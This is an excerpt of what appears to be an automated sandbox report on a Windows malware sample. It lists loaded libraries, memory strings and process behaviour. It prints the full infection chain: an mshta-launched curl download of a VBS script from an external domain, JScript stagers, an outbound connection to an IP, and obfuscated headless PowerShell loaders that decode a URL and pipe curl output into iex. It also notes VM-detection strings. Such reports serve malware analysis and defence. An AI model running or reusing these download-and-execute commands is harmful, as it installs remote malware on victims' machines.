          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
          Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: tomation.pdb source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986687032.0000021C27D4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2057511026.000001596AF6D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdby source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EB4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 0000000F.00000002.1986687032.0000021C27D4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2057511026.000001596AF6D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: utomation.pdbb< source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1986928715.0000021C27EB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2059479627.000001596B140000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdbntVersion source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2057511026.000001596AFA3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EA0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \mscorlib.pdb source: powershell.exe, 00000011.00000002.2057511026.000001596AEC4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbZ& source: powershell.exe, 0000000F.00000002.1986024982.0000021C27CA3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb4 source: powershell.exe, 00000011.00000002.2059479627.000001596B16B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000011.00000002.2059479627.000001596B140000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb` source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ows\System.Core.pdbpdb` source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbatP source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbt source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2059479627.000001596B140000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EA0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000011.00000002.2059479627.000001596B16B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ion.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EB4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: nt.Automation.pdb-4437-8B11-F424491E3931}\InprocSe source: powershell.exe, 00000011.00000002.2057511026.000001596AEC4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986251858.0000021C27CE3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbK source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)Jump to behavior
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0578EAB1 push dword ptr [eax]; ret 7_2_0578EB3E
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9B7E201D pushad ; retf 17_2_00007FFD9B7E23E1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9B7E815B push ebx; ret 17_2_00007FFD9B7E816A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9B7E00BD pushad ; iretd 17_2_00007FFD9B7E00C1

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6192
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3508
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5945
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3702
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5740 Thread sleep count: 6192 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128 Thread sleep count: 3508 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4428 Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6760 Thread sleep count: 5945 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7036 Thread sleep count: 3702 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452 Thread sleep time: -13835058055282155s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: wscript.exe, 0000000A.00000003.1910556458.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914583621.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911387839.0000000002DC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1910897341.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWlsy
          Source: wscript.exe, 00000007.00000003.1894609306.00000000059A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: wscript.exe, 00000007.00000003.1894609306.00000000059A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: mshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1901975042.00000000059A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1894254003.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895012733.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895437106.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895276719.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1900594503.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1910556458.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: mshta.exe, 00000000.00000002.1841794584.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838231650.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
          Source: mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWdWndClassu
          Source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
          Source: curl.exe, 00000004.00000003.1811312291.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2059479627.000001596B16B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: wscript.exe, 00000007.00000003.1894254003.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895012733.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895437106.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895276719.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1900594503.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\wscript.exe | Network Connect: 45.11.180.77 443
          Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
          Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs
          Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs"
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs"
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\pmxdhq.js
          Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
          Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
